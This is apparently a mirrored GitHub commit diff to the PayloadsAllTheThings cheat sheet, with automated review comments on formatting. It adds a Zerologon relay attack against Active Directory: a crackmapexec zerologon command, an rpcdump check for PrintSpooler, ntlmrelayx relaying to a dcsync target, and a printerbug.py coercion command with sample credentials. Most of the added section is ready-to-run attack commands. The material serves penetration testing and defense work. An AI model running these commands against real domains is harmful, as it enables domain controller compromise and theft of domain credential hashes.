mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Added zerologon authentication relay technique
This commit is contained in:
parent
d4742a9688
commit
8caba394d5
@ -661,6 +661,26 @@ Exploit steps from the white paper
|
|||||||
```powershell
|
```powershell
|
||||||
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
|
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
|
||||||
```
|
```
|
||||||
|
|
||||||
|
A 2nd approach to exploit zerologon is done by relaying authentication.
|
||||||
|
|
||||||
|
This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity.
|
||||||
|
The following prerequisites are needed:
|
||||||
|
* A domain account
|
||||||
|
* One DC running the `PrintSpooler` service
|
||||||
|
* Another DC vulnerable to zerologon
|
||||||
|
|
||||||
|
* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
|
||||||
|
```powershell
|
||||||
|
# Check if one DC is running the PrintSpooler service
|
||||||
|
rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"
|
||||||
|
|
||||||
|
# Setup ntlmrelay in one shell
|
||||||
|
ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support
|
||||||
|
|
||||||
|
#Trigger printerbug in 2nd shell
|
||||||
|
python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12
|
||||||
|
```
|
||||||
|
|
||||||
#### PrintNightmare
|
#### PrintNightmare
|
||||||
|
|
||||||
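Review bot: the fenced block in this hunk is tagged `powershell`, but every command in it (`rpcdump.py`, `ntlmrelayx.py`, `python3 printerbug.py`) is an Impacket or Python tool run from a Linux shell, so the fence should be tagged `bash`; in the same block `#Trigger printerbug in 2nd shell` needs a space after `#` to match the other two comments. On documentation: the commands use three different host identifiers (10.10.10.10 for the rpcdump check and as the printerbug target, DC01.LAB.LOCAL as the relay target, 10.10.10.12 as the host printerbug is pointed at) without the prose saying which one is the DC running PrintSpooler, which is the zerologon-vulnerable DC and which is the relaying host, so a short comment on each line mapping it to the prerequisite list would stop readers swapping them. The `ntlmrelayx` bullet should also state which version introduced the `dcsync://` target scheme, since the command fails on releases without it, and it belongs in the prerequisite list directly above rather than after a blank line. Minor wording: "A 2nd approach" and "2nd shell" read better as "A second approach" and "a second shell".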
@ -4148,4 +4168,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
||||||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
||||||
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
||||||
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
||||||
|
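Review bot: this hunk changes nothing visible (the same four reference entries appear on both sides and the header is -4148,4 +4168,4), so it is presumably a trailing-newline or line-ending change; it should either be mentioned in the commit message or dropped so the diff stays limited to the new technique. Since the References section is being touched anyway, the dirkjanm post linked inline in the first hunk (https://dirkjanm.io/a-different-way-of-abusing-zerologon) belongs here as a new entry, in the existing `* [Title - date - author](url)` format.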